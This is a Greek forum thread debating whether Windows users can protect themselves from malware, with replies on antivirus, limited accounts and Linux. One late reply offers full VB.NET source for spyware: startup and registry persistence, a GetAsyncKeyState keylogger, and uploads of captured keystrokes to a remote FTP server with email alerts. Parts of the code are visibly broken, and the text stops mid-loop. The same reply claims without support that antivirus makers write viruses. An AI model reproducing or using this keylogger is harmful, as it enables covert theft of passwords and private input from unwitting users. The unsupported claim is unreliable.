Προς το περιεχόμενο

Υπαρχει πραγματικα προστασια απο κακοβουλα λογισμικα?! Οχι κατ'εμε.

Nik0s

Προτεινόμενες αναρτήσεις

Δημοσ.

Ρε παιδια πιστευω πως εμεις ειδκα οι windows users ειμαστε αβοηθητοι μπροστα στα malware.

α) Τρεχουμε κατι σαν admin αν κολλησουμε κακοβουλο λογισμικο την βαψαμε. Αυτο θα εχει δικαιςματα διαχειριστη και θα μπορεσει να κανει shutdown ακομη και το firewall μας.

β) Τρεχουμε κατι logged on ως standard(limited) user account? To κακοβουλο λογισμικο δεν θα μπορεσει *ισως* να τερματισει το firewall μας αλλα σιγουρα θα μπορει να το κοροιδεψει κανοντας inject τον εαυτο του σε ενα open session ενος trusted application και θα στελνει ανενοχλητο traffic απο κει χωρις το firewall να παιρνει χαμπαρι. LUA ξε-LUA δηλαδη παλι ζημια, χωρια που ισως να μπορει να κανει elevate τα privileges του απο diminished => full.

c) Τα AVs και AntiSpywares' συνεχως ΔΕΝ θα μας προστατευουν επειδη θα κανουν κατα μεσο ορο 1,5 μηνες να αναγνωρισουν τα καινοθργια threats τα οποια εμεις θα εχουμε ηδη κολλησει και την ζημια θα την εχουμε ηδη παθει.

δ) Βαζεις extra security products? Και δεν βοηθανε γιατι και αυτα ακομη μπορει το malware να τα τερματισει αλλα επισης ειναι επικυνδυνο να τα τρεχουμε γιατι ειναι φτιαγμενα και αυτα απο κωδικα και μπορουν καλλιστα να περιεχουν security vulnerabilites. Extra ρισκα δηλαδη για εμας.

ε) Αν κλεισουμε τα ports μας, τοτε ναι υπαρχει ασφαλεια μαις που οι hackers ή τα κακοβουλα λογισμικα δεν εχουν points of access αλλα μετα δεν μπορουμε εμεις να κανουμε την δουελια μας γιατι οταν κλεινουμε ports ειναι σαν να κανουμε disbale καποια system services. Αν θελω web server πρεπει να εχω το πορτ 80 τουλαχιστον open για inbound connections αλλιως δεν μπορω να δεχτω συνδεσεις, αλλα απο την αλλη πλευρα το malware μια χαρα θα εκμεταλλευτει την ανοιγμενη απο εμενα 80 port. Ασε δηλαδη που κρυφα θα ανοιγει και τις δικες του.

ΕΙΜΑΣΤΕ ΣΥΝΕΧΩΣ ΚΑΤΑΔΙΚΑΣΜΕΝΟΙ ΝΑ ΚΟΛΛΑΜΕ ΜΑΛ....ΕΣ.

Δημοσ.

Αν είσαι τόσο απελπισμένος τότε ίσως τα Linux είναι μία λύση για εσένα.

Και έχε τα windows σε άλλο partition για κανένα game....αν παίζεις.

Εγώ πάντως χωρίς να ανησυχώ ιδιαίτερα δεν έχω παρατηρήσει ποτέ σοβαρά προβλήματα στο PC, απλά όταν βλέπω ότι έχει γεμίσει πολλές μαλακίες τότε του πετάω ένα format και ησυχάζω.....δεν θα σκάσω κιόλας. :-)

Δημοσ.

Για καστε με τον ιδιο τροπο δεν μπρουν να κολλησουν και τα linuxoeidh δηλαδη οπως και τα freebsdoειδη?

Δημοσ.

Στο Linux και το xBSD το μονο που πρεπει να φοβασε ειναι τα exploits που ανακαλυπτονται κατα καιρους, αν και patchαρονται πολυ συντομα, ακομη και μερικες ωρες μετα τον εντοπισμο τους (ενα απο τα θετικα του open source software). Ιοι οπως τους ξερουμε στα Windows δεν υπαρχουν, λογω της αρχιτεκτονικης των Linux/xBSD. Σπανια θα αποκτησουν root access κακοβουλα προγραμματα χωρις να τους εχεις δωσει εσυ αυτο το access.

Δεν ειναι ατρωτα, αλλα σιγουρα πολυ καλυτερα απο τα Windows στο τομεα της ασφαλειας.

Δημοσ.
Ρε παιδια πιστευω πως εμεις ειδκα οι windows users ειμαστε αβοηθητοι μπροστα στα malware.

κατά την άποψή μου, είναι σαν να λες ότι δεν υπάρχει προστασία αν πέσεις πάνω σε νάρκη όταν κόβεις βόλτες σε ναρκοπέδια

και η απάντηση είναι να αποφεύγεις τα ναρκοπέδια για βόλτες

αν δίνεις το email σου παντού και ότι email σου ρχεται το ανοίγεις (ναρκοπέδιο) έχεις δίκιο, τι προστασία να χεις εκεί

(παράδειγμα φέρνω, δεν το λέω συγκεκριμένα για σένα)

το δίκτυο έχει κινδύνους και για αυτό οι χρήστες πρέπει να προσέχουν τι κάνουν

εγώ δεν χρησιμοποιώ antivirus και πιστεύω πως αν ακολουθείς μερικούς απλούς κανόνες δεν θα χεις κανένα πρόβλημα

για να το κάνω πιο συγκεκριμένο η καλύτερη συμβουλή είναι να μάθεις λίγο καλύτερα πως διαδίδονται τα επικίνδυνα προγράμματα ώστε να τα αποφεύγεις, εάν δεν ξέρεις ότι διαδίδονται μέσω ορισμένων email ή μέσω ορισμένων ιστοσελίδων ή μέσω ορισμένων download, τότε είναι πολύ δύσκολο να προστατευτείς από κάτι που δεν γνωρίζεις

αν ενημερωθείς όμως, δεν νομίζω πως είναι αδύνατη η ασφαλής περιήγηση στο internet χωρίς παράλληλα να περιοριστούν στο μηδέν οι δραστηριότητες

χρόνια πολλά

Δημοσ.

Δεν το ξερα να αποφευγω τις ρωσικες σελιδες οι οποιες εχουν το καλυτερο warez μεσα.

Αν δεν μπορουν να προστατευσουν τοτε τι τα εγκαθιστουεμ στο συστημα μας. αφου ειναι αχρηστα?

Ουτε σκριπτ μπλοκερ ουτε τιποτα, εδω μιλαμε εχω δει malware να κλεινει το firewall aki to antivirus και να στελνει ανενοχλητο to traffic του.

Αλλα και να μην μπορει να το kanei shutdown μπορει πολυ ευκολα να το ξεγελασει.

Προστασιες για τα κλαματα εχουμε στα pc μας.

Να πληρωνεις και να κολλας και απο πανω να περνις τηλ υποστηριξη Norton Antivirus και αν σου λενε με 100€ θα σου καθαρισουν ονλινε το συστημα το οποιο θα επρεπε να προστατευει εξαρχης το κωλοproduct τους.

ΚΑΙ ΝΑΙ ΡΕ ΘΕΛΩ ΝΑ ΚΑΕΤΒΑΣΩ ΕΠΙΤΗΔΕS ΜΑLWARE ΝΑ ΠΡΟΣΠΑΘΩ ΝΑ ΤΟ ΤΡΕΞΩ ΚΑΝΟΝΑΤς ΔΙΛΠΟ ΚΛΙΚ ΠΑΝΩ ΤΟΥ ΚΑΙ ΤΟ ΓΑΜ.. ΤΟ av KAI TO fw NA TO PAIRNEI ΧΑΜΠΑΡΙ ΚΑΙ ΝΑ ΤΟ ΜΠΛΟΚΑΡΕΙ, ΑΛΛΙΩς ΤΙ ΠΡΟΣΤΑΣΙΑ ΚΑΙ ΜΛΚ...

Δημοσ.

αν θελεις να κατεβαζεις επιτιδες malware παντα θα κολλας !!!!!

τα κακοβουλα προγραμματα ανανεονονται ποιο γρηγορα απο τα virus definitions και τα patch του λειτουργικου

ο ΧΡΗΣΤΗΣ ειναι ΥΠΕΥΘΗΝΟΣ για να μην κολαει κακοβουλα προγραμματα

δεν χρησημοποιω κανενα antivirus εδω και 4 χρονια απλα προσεχω που δινω το mail μου ,τι e-mail ανοιγω ,σε ποιες σελιδες μπαινω και τι κατεβαζω

Δημοσ.
...

μαζί σου είμαι αλλά εντάξει και γω θέλω να είναι δωρεάν όλα τα προγράμματα και θέλω και μια ferrari αλλά δεν είναι ρεαλιστικά αυτά τα θέλω

είναι σαν να μου λες πληρώνουμε το κράτος για την ασφάλεια των πολιτών >>> άρα >>> αν σταθώ στις γραμμές του τρένου ενώ αυτό έρχεται τότε πρέπει το κράτος να με προστατεύσει

κάποια στιγμή πρέπει να μάθεις πως να χρησιμοποιείς το internet έτσι δεν είναι?

εξάλλου διαβάσεις τα manual των anti*, (τουλάχιστον στα περισσότερα) το διευκρινίζουν αυτό, μη διαμαρτύρεσαι

παράδειγμα

για μικρά προγράμματα εγώ κατεβάζω το πρόγραμμα από το official site trial, πράγμα που σημαίνει ότι δεν χρειάζεται να το ελέγξω και τα υπόλοιπα στοιχεία (δεν αναφέρομαι γιατί δεν ξέρω αν επιτρέπεται από τους κανόνες του forum) τα βρίσκω από text και μόνο, γιατί το text δεν μπορεί να μεταφέρει τπτ

έτσι δεν υπάρχει κανένα θέμα προστασίας, δεν είναι τόσο δύσκολο

για μεγάλα αρχεία που ούτως ή άλλως δεν υπάρχει μεγάλος κίνδυνος πολύ απλά ακολουθώ τις αξιόπιστες πηγές

αντί να μπαίνω τυχαία εδώ κι εκεί και να περιμένω από τα προγράμματα να με προστατεύσουν, μπαίνω μόνο "εκεί που μου λένε", εμπιστεύομαι μόνο τις πηγές που ξέρω

ούτε αυτό είναι τόσο δύσκολο, απλά το μαθαίνεις με το καιρό

να σου πω ότι και εγώ - παλιότερα βέβαια που τα anti* όχι δεν εξασφαλίζαν προστασία αλλά λειτουργούσαν κατά του συστήματος εντελώς - είχα έρθει στο ίδιο σημείο

αναρωτιόμουν τι σκ... anti* είναι αν δεν κάνουν τπτ (παλιά δεν λειτουργούσε καθόλου η λειτουργία του fix την οποία έδιναν όμως)

οπότε απλά προσαρμόστηκα και άρχισα να μαθαίνω τα πράγματα λίγο καλύτερα

οπότε δυστυχώς δεν υπάρχει λύση/απάντηση σε αυτό που θες μάλλον, αναγκαστικά πρέπει να προσαρμοστείς στην πραγματικότητα και άμα θες σου προτείνω να στείλεις τα anti* από κει που ρθαν

Δημοσ.

εγω χερω που πρεπει να μπαινω και τι πρεπει να κατεβαζω και να ΜΗΒΝ κατεβαζω καθως και το τι πρεπει να τρεχω αλλα με βαρεια την καρδια διαπιστωνω πως στα windows οσο και να προσεχεις παλι την ζημια θα την παθεις.

Ειναι κατι σαν τα σκατα τα οποια συνεχως μαζευουν μυγες γυρω τους9συγγνωμη για την αθυροστομια μου)

υ.γ. Το παραδειγμα με το κρατος και τις γραμμες του τρενου μου αρεσε πολυ :-)

Δημοσ.
Για καστε με τον ιδιο τροπο δεν μπρουν να κολλησουν και τα linuxoeidh δηλαδη οπως και τα freebsdoειδη?

Από τους 40 ιούς που έχουν αναφερθεί μέχρι σήμερα για Linux (υπενθυμίζω ότι αντίστοιχα στα win έχουμε μερικές εκατοντάδες χιλιάδες), ΚΑΝΕΝΑΣ δεν πέτυχε να αναπαραχθεί μαζικά και ΟΛΟΙ έμειναν στο εργαστήριο, όσο πεισματικά και αν προσπάθησαν ειδικοί ερευνητές να τους κάνουν να εξαπλωθούν πειραματικά.

Εν κατακλείδι, φίλε nikos, σου εγγυώμαι ότι εγκαθιστώντας κάποια μοντέρνα linux διανομή, δεν κινδυνεύεις από τίποτα, ΟΠΟΙΟ τόπο και αν επισκεφτείς στο διαδίκτυο.

Υ.Γ. Το γνωρίζω ότι ο mod που έχει avatar τη φάτσα του Αλ Μπάντι δεν επιτρέπει να μιλάμε για οτιδήποτε άλλο πλην win software σε αυτό το subforum. Ας με συγχωρέσει όμως, απλά απάντησα σε ερώτηση.

ο ΧΡΗΣΤΗΣ ειναι ΥΠΕΥΘΗΝΟΣ για να μην κολαει κακοβουλα προγραμματα

Εγώ διαφωνώ. Το OS είναι υπεύθυνο να προστατεύει το χρήστη. Δεν μπορούν όλοι οι χρήστες να γνωρίζουν για το κακόβουλο λογισμικό και πώς να το αποφύγουν.

δεν χρησημοποιω κανενα antivirus εδω και 4 χρονια απλα προσεχω που δινω το mail μου ,τι e-mail ανοιγω ,σε ποιες σελιδες μπαινω και τι κατεβαζω

Ούτε και εγώ χρησιμοποιώ antivirus, αλλά μπαίνω όπου θέλω χωρίς να ανησυχώ για τίποτα :-)

Να σου θυμίσω ότι υπάρχουν και ιοί που δε χρειάζεται να επισκεφτείς κάποιο τόπο για να κολλήσεις. Να σου θυμίσω το worm πριν κάποια χρόνια που έκανε shutdown τους υπολογιστές με win? Οι περισσότεροι το κόλλησαν από τους providers τους, με το που συνδέονταν on line. Win χωρίς antivirus είναι παιχνίδι με τη φωτιά, ειδικά αν έχεις στο δίσκο σου ευαίσθητα δεδομένα ή τη δουλειά σου. Τώρα, αν εσύ είσαι χομπίστας και δε σε νοιάζει να κάνεις και κανά format αν χρειαστεί, πάω πάσο. Μπορείς όμως να πεις σε οποιοδήποτε επαγγελματία να μείνει χωρίς A/V ?

Δημοσ.

ναι φιλε μου exw balei ubuntu εδς και 1 εβδομαδα, ασχετος δεν ειμαι αλλα ξερω μονο τα πολυ βασικα.

Ποιο φορουμ θα μου προτεινες αποτα τοσα για να λυνω αποριες?(εγω θα ηθελα εδω μεσα να ρωταω αν εχουμε πολλους και δυαντους λυτες οπως που πιστευω πως εχουμε).

Οσο για προστασια σε ερωτηση μου στο usenet γιατι ενω υπαρχει υπερπληθωρα fw kai avs το 95% των win μηχανηματων ειναι infected κοιτα τι μου απαντησε.

Because people still:

- work with admin privileges

- provide services they don't actually want to provide

- don't keep their software up-to-date

- run software without even thinking about whether that may be a good idea or not (like, opening encrypted attachments from e-mails)

Αρα παιδια αν εφαρμοζοντε ολα τα παραπανω σωστα δεν χρειαζοντε ουτε firewalls ουτε antivirus/antispyware ουτε τιποτα.

αντιθετως ο χρηστης μπορει να χρησιμοποει monitoring tools οπως TCPView, Whireshark, Proccess Explorer για να διαπιστωνει σε καθημερινη βαση την ποιοτητα των διεργασιων του συστηματος του αλλα και το traffic που διακινειται. Αλλα βεβαια αυτο θελει προχωρημενες γνωσεις που ο απλος χρηστης δεν διαθετει.

Ε ας κανει τα παραπανω τοτε

Επισης ο διιο τυπος μου ειπε πως τα malware για windows ειναι over a million ενω για λινουξ +uνιξ μαζι 1000 περιπου τον αριθμο για τα οποια το 99,9% υπαρχουν patches για το host OS.

Δημοσ.
Ποιο φορουμ θα μου προτεινες αποτα τοσα για να λυνω αποριες?(εγω θα ηθελα εδω μεσα να ρωταω αν εχουμε πολλους και δυαντους λυτες οπως που πιστευω πως εχουμε).

Φυσικά το http://ubuntuforums.org/ και το linux subforum του insomnia!

Δημοσ.
Φυσικά το http://ubuntuforums.org/ και το linux subforum του insomnia!

Τελεια! Θα σας τα κανω ΝΑ απο τις ερωτησεις! ;-)

Just kidding υα διαβαζω κιολας.

Βασικα προτιμω να ρωταω σε ΕΝΑ και ΚΑΛΟ φορουμ γιατι τις τελευταις 3 μερες εχω χασει την μπαλλα να ρωταω τα ιδια πραματα σε 3 ελληνικα φορουμς PLUS στο Usenet.

Just 1 φορουμ plz! προσωπικα προτιμω εδω να τα λες με πατριωτες αλλα ομολοφω ομως οτι ορισμενοι ξενοι ειναι παρα πολυ εξιδικευμενοι.

Δημοσ.

α) Τρεχουμε κατι σαν admin αν κολλησουμε κακοβουλο λογισμικο την βαψαμε. Αυτο θα εχει δικαιςματα διαχειριστη και θα μπορεσει να κανει shutdown ακομη και το firewall μας.

β) Τρεχουμε κατι logged on ως standard(limited) user account? To κακοβουλο λογισμικο δεν θα μπορεσει *ισως* να τερματισει το firewall μας αλλα σιγουρα θα μπορει να το κοροιδεψει κανοντας inject τον εαυτο του σε ενα open session ενος trusted application και θα στελνει ανενοχλητο traffic απο κει χωρις το firewall να παιρνει χαμπαρι. LUA ξε-LUA δηλαδη παλι ζημια, χωρια που ισως να μπορει να κανει elevate τα privileges του απο diminished => full.

c) Τα AVs και AntiSpywares' συνεχως ΔΕΝ θα μας προστατευουν επειδη θα κανουν κατα μεσο ορο 1,5 μηνες να αναγνωρισουν τα καινοθργια threats τα οποια εμεις θα εχουμε ηδη κολλησει και την ζημια θα την εχουμε ηδη παθει.

δ) Βαζεις extra security products? Και δεν βοηθανε γιατι και αυτα ακομη μπορει το malware να τα τερματισει αλλα επισης ειναι επικυνδυνο να τα τρεχουμε γιατι ειναι φτιαγμενα και αυτα απο κωδικα και μπορουν καλλιστα να περιεχουν security vulnerabilites. Extra ρισκα δηλαδη για εμας.

ε) Αν κλεισουμε τα ports μας, τοτε ναι υπαρχει ασφαλεια μαις που οι hackers ή τα κακοβουλα λογισμικα δεν εχουν points of access αλλα μετα δεν μπορουμε εμεις να κανουμε την δουελια μας γιατι οταν κλεινουμε ports ειναι σαν να κανουμε disbale καποια system services. Αν θελω web server πρεπει να εχω το πορτ 80 τουλαχιστον open για inbound connections αλλιως δεν μπορω να δεχτω συνδεσεις, αλλα απο την αλλη πλευρα το malware μια χαρα θα εκμεταλλευτει την ανοιγμενη απο εμενα 80 port. Ασε δηλαδη που κρυφα θα ανοιγει και τις δικες του.

ΔΕΝ ΥΠΑΡΧΕΙ ΚΑΜΙΑ ΑΠΟΛΥΤΟΣ ΠΡΟΣΤΑΣΙΑ ΕΝΑΝΤΙΑ ΣΕ ΜΙΑ ΟΡΓΑΝΩΜΕΝΗ ΕΠΙΘΕΣΗ

a+B) Γενικά τα Windows δουλεύουν με τέτοιο τρόπο που η αλλάγες στα Privileges ενώς χρήστη είναι εφικτές in just one line of code.

Έτσι είναι πανεύκολο να φτιάξεις δικά σου προγράμματα αντίθετα με τα Mac που δεν σου αποκαλύπτουν τίποτα για τον τρόπο λειτουργίας τους

(κάνοντας αδύνατη την δημιουργία ενώς ιού) για 'υτό τα Windows κατέχουν το 90% σε Operating Systems (OS).

c+d) Αναγνωρίζουν already known attacks + κομμάτια κόδικα που είναι προφανώς malicious nothing complicated

αφου οι ίδιες εταιρίες που φτιάχνουν τα Spyware και Anti-Malware πειραματίζονται φτιάχνοντας ιους .

Είναι σαν να ψεκάζεις τον αέρα με αρρώστιες και να πουλάς αντιβιοτικά.

e) Πως να φτιάξεις ένα 100% Working Spyware:

Σύνδεση ανάμεσα στα δυο PC χρησιμοποιώντας έναν FTP Server:

MASTER PC <--> FTP SERVER <--> VICTIM PC

έτσι επιτυνχάνεις την ανταλλαγή πληροφοριών no-probs εκτός

και αν θες έναν απλο keylogger οπότε χρησιμοποιείς το send email function.

SPYWARE IN VB.NET BY NIXZ

[FORM1-FTPMANAGER]:

>Imports System.IO
Imports System.Net
Imports System.Net.Mail
Public Class Form1
   'Member Info
   Private MemberUsername = "WebMaster"
   Private MemberEmail = "[email protected]"
   'Servers Info
   Private StandardHttpServerMain = "http://restricted.com/"
   Private FtpServerHash As String = "ftp://restricted.com/"
   Private HttpServerHash As String = "http://restricted.com/"
   Private FtpUsername As String = "restricted.com"
   Private FtpPassword As String = "12345"
   'File and Folders Declaration
   Private MainFolder As String = "C:\Temp"
   Private ExeFile As String = "C:\Temp\asvdsadfgv.exe"
   Private KeysFile As String = "C:\Temp\6b657973.dat"
   Private ServerFile As String = "C:\Temp\73657276657273.dat"
   'Public Variables declaration
   Private Hash = String.Empty
   Private Mail As Net.Mail.MailMessage
   Private Server As Net.Mail.SmtpClient
   Private UserLogin As NetworkCredential

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
       On Error Resume Next
       'Prevent Confusion
       If Process.GetProcessesByName(System.IO.Path.GetFileNameWithoutExtension(Process.GetCurrentProcess.MainModule.ModuleName)).Length > 1 Then
           Me.Close()
       End If
       'Modify Registry
       If Not System.IO.File.Exists((Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\Update.exe")) Then
           System.IO.File.Copy(ExeFile, Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\Update.exe")
           My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Windows", ExeFile, Microsoft.Win32.RegistryValueKind.String)
       End If
       'Check for Installation
       If Not System.IO.Directory.Exists(MainFolder) Then
           System.IO.Directory.CreateDirectory(MainFolder)
       End If
       'Get Hash
       For Each Chr As Char In My.User.Name.ToString.ToLower
           If Chr = "a" Or Chr = "b" Or Chr = "c" Or Chr = "d" Or Chr = "e" Or Chr = "f" Or Chr = "g" Or Chr = "h" Or Chr = "i" Or Chr = "j" Or Chr = "k" Or Chr = "l" Or Chr = "m" Or Chr = "n" Or Chr = "o" Or Chr = "p" Or Chr = "q" Or Chr = "r" Or Chr = "s" Or Chr = "t" Or Chr = "u" Or Chr = "v" Or Chr = "w" Or Chr = "x" Or Chr = "y" Or Chr = "z" Then
               Hash &= Chr
           End If
       Next
       'Download ServerFile
       If System.IO.File.Exists(ServerFile) Then
           System.IO.File.Delete(ServerFile)
       End If
       My.Computer.Network.DownloadFile(StandardHttpServerMain & "Server.dat", ServerFile)
       'Read ServerFile
       Dim ReadServerInfoFile As New StreamReader(ServerFile)
       FtpServerHash = ReadServerInfoFile.ReadLine
       HttpServerHash = ReadServerInfoFile.ReadLine
       FtpUsername = ReadServerInfoFile.ReadLine
       FtpPassword = ReadServerInfoFile.ReadLine
       ReadServerInfoFile.Close()
       'Delete ServerFile
       End If
       'Save Keys on Server
       Dim FTPRequest2 As System.Net.FtpWebRequest = DirectCast(System.Net.WebRequest.Create(FtpServerHash & MemberUsername & "/" & Hash & ".txt"), System.Net.FtpWebRequest)
       FTPRequest2.Credentials = New System.Net.NetworkCredential(FtpUsername, FtpPassword)
       FTPRequest2.Method = System.Net.WebRequestMethods.Ftp.UploadFile
       Dim File2() As Byte = System.IO.File.ReadAllBytes(KeysFile)
       Dim FTPStream2 As System.IO.Stream = FTPRequest2.GetRequestStream()
       FTPStream2.Write(File2, 0, File2.Length)
       FTPStream2.Close()
       FTPStream2.Dispose()
       'Send Email
       Mail = New Net.Mail.MailMessage("[email protected]", MemberEmail)
       With Mail
           .Subject = "Mail " & "( " & My.User.Name & " )"
           .Body = "Link: " & HttpServerHash & MemberUsername & "/" & Hash & ".txt"
           .IsBodyHtml = False
           .Priority = MailPriority.High
       End With
       Server = New Net.Mail.SmtpClient("smtp.gmail.com", "587")
       Server.EnableSsl = True
       UserLogin = New Net.NetworkCredential("ASDFASD", "ASDFASF")
       Server.Credentials = UserLogin
       Server.Send(Mail)
       Mail.Dispose()
       'Start Keylogger
       Form2.Show()
   End Sub

Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
       On Error Resume Next
       'Modify Registry
       If Not System.IO.File.Exists((Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\Update.exe")) Then
           System.IO.File.Copy(ExeFile, Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\Update.exe")
           My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Windows Services", ExeFile, Microsoft.Win32.RegistryValueKind.String)
       End If
       'Check for Installation
       If Not System.IO.Directory.Exists(MainFolder) Then
           System.IO.Directory.CreateDirectory(MainFolder)
       End If
       'Get Hash
       For Each Chr As Char In My.User.Name.ToString.ToLower
           If Chr = "a" Or Chr = "b" Or Chr = "c" Or Chr = "d" Or Chr = "e" Or Chr = "f" Or Chr = "g" Or Chr = "h" Or Chr = "i" Or Chr = "j" Or Chr = "k" Or Chr = "l" Or Chr = "m" Or Chr = "n" Or Chr = "o" Or Chr = "p" Or Chr = "q" Or Chr = "r" Or Chr = "s" Or Chr = "t" Or Chr = "u" Or Chr = "v" Or Chr = "w" Or Chr = "x" Or Chr = "y" Or Chr = "z" Then
               Hash &= Chr
           End If
       Next
       'Download ServerFile
       End If
       My.Computer.Network.DownloadFile(StandardHttpServerMain & "Server.dat", ServerFile)
       'Read ServerFile
       Dim ReadServerInfoFile As New StreamReader(ServerFile)
       FtpServerHash = ReadServerInfoFile.ReadLine
       HttpServerHash = ReadServerInfoFile.ReadLine
       FtpUsername = ReadServerInfoFile.ReadLine
       FtpPassword = ReadServerInfoFile.ReadLine
       ReadServerInfoFile.Close()
       'Delete ServerFile
       End If
       'Download KeysFile
       If System.IO.File.Exists(KeysFile) Then
           System.IO.File.Delete(KeysFile)
       End If
       My.Computer.Network.DownloadFile(HttpServerHash & MemberUsername & "/" & Hash & ".txt", KeysFile)
       'Read KeysFile
       Dim ReadKeysFile As New StreamReader(KeysFile)
       Dim Keys = ReadKeysFile.ReadToEnd
       ReadKeysFile.Close()
       'Save KeysFile
       Dim WriteKeysFile2 As New StreamWriter(KeysFile)
       WriteKeysFile2.Write(Keys)
       WriteKeysFile2.Close()
       'Save Keys on Server
       Dim FTPRequest2 As System.Net.FtpWebRequest = DirectCast(System.Net.WebRequest.Create(FtpServerHash & MemberUsername & "/" & Hash & ".txt"), System.Net.FtpWebRequest)
       FTPRequest2.Credentials = New System.Net.NetworkCredential(FtpUsername, FtpPassword)
       FTPRequest2.Method = System.Net.WebRequestMethods.Ftp.UploadFile
       Dim File2() As Byte = System.IO.File.ReadAllBytes(KeysFile)
       Dim FTPStream2 As System.IO.Stream = FTPRequest2.GetRequestStream()
       FTPStream2.Write(File2, 0, File2.Length)
       FTPStream2.Close()
       FTPStream2.Dispose()
   End Sub
End Class

[FORM2-KEYLOGGER]:

>Public Class Form2

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Integer) As Short
   Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Integer) As Short
   Public Function getCapslock() As Boolean
       getCapslock = CBool(GetKeyState(System.Windows.Forms.Keys.Capital) And 1)
   End Function
   Public Function getShift() As Boolean
       getShift = CBool(GetAsyncKeyState(System.Windows.Forms.Keys.ShiftKey))
   End Function

Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
       On Error Resume Next

'My KeyLogger
       Dim i As Object
       Dim Pressed As Object
       Dim LineLimit As Int32 = 69
       Dim Key As Object
       On Error Resume Next
       Pressed = GetAsyncKeyState(13)
       If Pressed = -32767 Then
           Key = "[EN]"
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(8)
       If Pressed = -32767 Then
           Key = "[bS]"
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(32)
       If Pressed = -32767 Then
           Key = " "
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(186)
       If Pressed = -32767 Then
           If getShift() = False Then
               Key = ";"
           Else
               Key = ":"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(187)
       If Pressed = -32767 Then
               Key = "="
           Else
               Key = "+"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(188)
       If Pressed = -32767 Then
               Key = ","
           Else
               Key = "<"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(189)
       If Pressed = -32767 Then
               Key = "-"
           Else
               Key = "_"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(190)
       If Pressed = -32767 Then
               Key = "."
           Else
               Key = ">"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(191)
       If Pressed = -32767 Then
               Key = "/"
           Else
               Key = "?"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(192)
       If Pressed = -32767 Then
               Key = "`"
           Else
               Key = "~"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(96)
       If Pressed = -32767 Then
               Key = "0"
           Else
               Key = ")"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(97)
       If Pressed = -32767 Then
               Key = "1"
           Else
               Key = "!"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(98)
       If Pressed = -32767 Then
               Key = "2"
           Else
               Key = "@"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(99)
       If Pressed = -32767 Then
               Key = "3"
           Else
               Key = "#"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(100)
       If Pressed = -32767 Then
               Key = "4"
           Else
               Key = "$"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(101)
       If Pressed = -32767 Then
               Key = "5"
           Else
               Key = "%"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(102)
       If Pressed = -32767 Then
               Key = "6"
           Else
               Key = "7"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(103)
       If Pressed = -32767 Then
               Key = "7"
           Else
               Key = "&"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(104)
       If Pressed = -32767 Then
               Key = "8"
           Else
               Key = "*"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(105)
       If Pressed = -32767 Then
               Key = "9"
           Else
               Key = "("
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(106)
       If Pressed = -32767 Then
               Key = "*"
           Else
               Key = ""
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(107)
       If Pressed = -32767 Then
               Key = "+"
           Else
               Key = "="
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(108)
       If Pressed = -32767 Then
           Key = ""
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(109)
       If Pressed = -32767 Then
               Key = "-"
           Else
               Key = "_"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(110)
       If Pressed = -32767 Then
               Key = "."
           Else
               Key = ">"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(111)
       If Pressed = -32767 Then
           Key = "/"
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(2)
       If Pressed = -32767 Then
               Key = "/"
           Else
               Key = "?"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(220)
       If Pressed = -32767 Then
               Key = "\"
           Else
               Key = "|"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(222)
       If Pressed = -32767 Then
               Key = "'"
           Else
               Key = Chr(34)
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(221)
       If Pressed = -32767 Then
               Key = "]"
           Else
               Key = "}"
           End If
           GoTo KeyFound
       End If
       Pressed = GetAsyncKeyState(219)
       If Pressed = -32767 Then
               Key = "["
           Else
               Key = "{"
           End If
           GoTo KeyFound
       End If
       For i = 65 To 128
           Pressed = GetAsyncKeyState(i)
           If Pressed = -32767 Then
                   If getCapslock() = True Then
                       Key = UCase(Chr(i))
                   Else
                       Key = LCase(Chr(i))
                   End If
               Else
                   If getCapslock() = False Then
                       Key = UCase(Chr(i))
                   Else
                       Key = LCase(Chr(i))
                   End If
               End If
               GoTo KeyFound
           End If
       Next i
       For i = 48 To 57
